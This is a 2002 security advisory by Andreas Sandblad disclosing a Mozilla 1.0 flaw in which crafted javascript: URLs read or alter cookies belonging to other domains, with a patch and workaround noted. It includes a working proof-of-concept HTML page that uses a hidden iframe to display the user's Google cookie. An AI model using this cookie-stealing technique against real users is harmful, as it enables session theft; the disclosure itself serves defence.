|
COMMAND Mozilla cookie can be stollen & spoofed SYSTEMS AFFECTED Mozilla 1.0 PROBLEM Thanks to : _ _ o' ,=./ `o Andreas Sandblad [sandblad@acc.umu.se] (o o) advisory [#9] ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- Credits to Ingesson, Quitta, Hawkan. BACKGROUND: =========== I orginally thought this was a XSS (cross site scripting) issue, but soon came to the conclusion that it is limited to a design error in restricting access to cookies. Even though Mozilla is open source, I have not been studying the source code in order to find and exploit the vulnerability. In the beginning I had problems not generating any javascript errors when using the javascript URL. My first solution was to make the host and path to be a valid javascript expression. Google.com may be a valid expression if google is an object and com is an element/variable of the Google object. Further on if Google.com is an int, it is legal to use google.com/ 1. Parsing of host and path will stop when a space is found. Well, I soon found a much easier solution. Simply put a // in front of the host and path and a \n before the cookie reading code accour. The reason why I didn't find this directly was because the newline must be created in a javascript function. It can't be set directly in a javascript url. DESCRIPTION: ============ Mozilla allows script in the javascript protocoll to set and read cookies. For javascript URLs the host and path for the cookie is pulled out as: "javascript:[host][path]" Cookie security is based only on restricting access to correct matching host and path. By carefully crafting a mallicious javascript URL opened in a new frame/iframe/window, it is possible to access and alter cookies from other domains. DETAILS: ======== The easiest way to exploit the vulnerability is to simply create a javascript URL in a javascript function as: javascript://[host]/[path]\n[code to read cookie] The // will make sure host and path don't generate any javascript errors. EXPLOIT: ======== Instructions: Put the exploit in a html document on a remote server and load it with your Mozilla browser to activate the exploit. -------------------------- CUT HERE ---------------------------- <pre> Title: Mozilla cookie stealing/spoofing Date: [2002-07-24] Impact: Steal/spoof arbitrary cookie _ _ using javascript: URLs o' \,=./ `o Author: Andreas Sandblad, sandblad@acc.umu.se (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- This demo will display your google cookie (must exist). </pre> <body onload=init()> <iframe name=f height=0 width=0 style=visibility:hidden></iframe> <script> function init(){ f.location = "javascript://www.google.com/\n"+ "'<body onload=alert(document.cookie)>'"; } </script> -------------------------- CUT HERE ---------------------------- SOLUTION Patch ===== The author has been working with Mozilla to produce a patch. Problem is fixed in Mozilla 1.1 Beta released 02-07-22. Workaround ========== In Preferences->Advanced->Scripts & Plugins-> Disable access to cookies using javascript